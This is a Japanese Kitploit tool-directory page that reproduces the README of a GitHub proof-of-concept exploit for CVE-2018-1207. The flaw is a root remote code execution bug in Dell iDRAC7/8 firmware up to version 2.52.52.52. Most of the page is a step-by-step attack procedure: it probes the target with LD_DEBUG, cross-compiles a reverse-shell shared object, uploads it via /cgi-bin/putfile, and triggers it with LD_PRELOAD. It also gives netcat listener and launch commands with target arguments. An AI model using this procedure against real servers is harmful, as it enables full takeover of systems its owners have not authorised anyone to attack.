Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/hironull/cve-2018-1207-better
組み込みシステムセキュリティ脆弱性分析エクスプロイトペネトレーションテストハードウェアセキュリティ学習と教育リモートアクセスツールバイナリエクスプロイト
GitHubhironull/cve-2018-1207-better

CVE-2018-1207-better

ファームウェア 2.52.52.52 以下の iDRAC 7 & 8 用リバースシェル CVE

リポジトリを見る
51年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2018-1207 のエクスプロイト PoC: Dell iDRAC7/iDRAC8 RCE (リバースシェル)

このリポジトリには、ファームウェアバージョン 2.52.52.52 以下の iDRAC7 および iDRAC8 デバイスに存在するリモートコード実行エクスプロイトを実証する Proof of Concept Python スクリプトが含まれています。このエクスプロイトにより、攻撃者は root レベルユーザーとしてコードを実行でき、システム全体の乗っ取りにつながる可能性があります。コードでは、このエクスプロイトを使用したリバースシェル攻撃を実行することでこれを示しています。このリポジトリのコードは、Michael Gargiullo (mgargiullo) による元のエクスプロイトの編集版です。

免責事項 - このコードは教育目的のみで提供されています。このスクリプトを使用して、自分が所有していない、または明示的な書面による同意を得ていないデバイスを攻撃することはできません。適切な許可なくこのスクリプトをシステムに使用することは違法です。このツールの誤用や損害について、私は一切の責任を負いません。許可なく使用すると、罰金や懲役を含む重大な法的結果を招く可能性があります。

このエクスプロイトはどのように動作するのか?

  1. 最初にエクスプロイトは、ターゲットが脆弱かどうかを確認します。これを行うには、特別なパラメータ ?LD_DEBUG=files を付けてログインページにリクエストを送信します。応答に、どのライブラリファイルをロードしようとしているかを示すデバッグコンテンツが含まれている場合、脆弱であることがわかります。
  2. チェックが完了し、デバイスが脆弱であると確認されたら、スクリプトは C コードを含むファイルを作成します。このファイルは、エクスプロイトをトリガーしたときにデバイスで実行され、リバースシェル接続が確立されます。
  3. 次に、sh4-linux-gnu-gcc を使用して作成した C コードファイルをコンパイルします。iDRAC は SuperH (SH4) プロセッサアーキテクチャ上で動作するため、コードを共有オブジェクト (.so) にコンパイルして iDRAC で実行可能にする必要があります。
  4. コンパイルが完了したら、POST リクエストを /cgi-bin/putfile に送信してファイルをアップロードします。これにより、ファイルは /tmp/sshpkauthupload.tmp に保存されます。
  5. ファイルがアップロードされた後、?LD_PRELOAD=/tmp/sshpkauthupload.tmp パラメータを付けて /cgi-bin/discover に別の GET リクエストを送信します。これにより、iDRAC は他のライブラリより先に指定されたライブラリをロードするよう強制され、/tmp/ ディレクトリから変更された .so ファイルがロードされます。
  6. ペイロードのコードは constructor 関数内にあるため、ロードされると即座にコードが実行され、root ユーザー (Linux ベースシステムで最高権限を持つユーザー) としてリバースシェルが確立されます。

必要条件

スクリプトを実行する前に、以下のものが揃っていることを確認してください。

  • Python3
  • Python3 の requests モジュール (pip install requests でインストール可能)
  • SH4 C クロスコンパイラ (sudo apt install gcc-sh4-linux-gnu でインストール可能)

これらの要件を満たしていない場合、問題が発生し、エクスプロイトを完全に実行できません! これらの要件が満たされているかどうかを確認するチェックは行われていません。

使い方

  1. リバースシェルを受け取るために、マシンでリスナーを起動します。これには netcat を使用します。

    root@kitploit:~
    nc -lvnp <LPORT>
    

    <LPORT> はリスニングするポート (例: 5000) に置き換えてください。

  2. 必要な引数を指定してスクリプトを実行します。

    root@kitploit:~
    python3 cve-2018-1207.py --rhost <RHOST> --rport <RPORT> --lhost <LHOST> --lport <LPORT>
    

引数

  • --rhost: ターゲット iDRAC の IP アドレス。
  • --rport: iDRAC Web インターフェースのポート (通常は 443)。
  • --lhost: リバースシェルが接続するあなたのローカル IP アドレス。
  • --lport: Netcat リスナーが実行されているローカルポート。
  • --keep-payload: (オプション) 設定すると、実行後に payload.c と payload.so をマシンから削除しません。

例

  1. 攻撃者のマシン (IP: 192.168.1.100) - リスナーを起動します。

    root@kitploit:~
    nc -lvnp 5000
    
  2. 攻撃者のマシン - 192.168.1.50 の iDRAC をターゲットにしてエクスプロイトを実行します。

    root@kitploit:~
    python3 cve-2018-1207.py --rhost 192.168.1.50 --rport 443 --lhost 192.168.1.100 --lport 5000
    

    成功すると、Netcat ターミナルでシェルセッションが取得でき、racadm などのコマンドを実行できるようになります。

ツールをダウンロード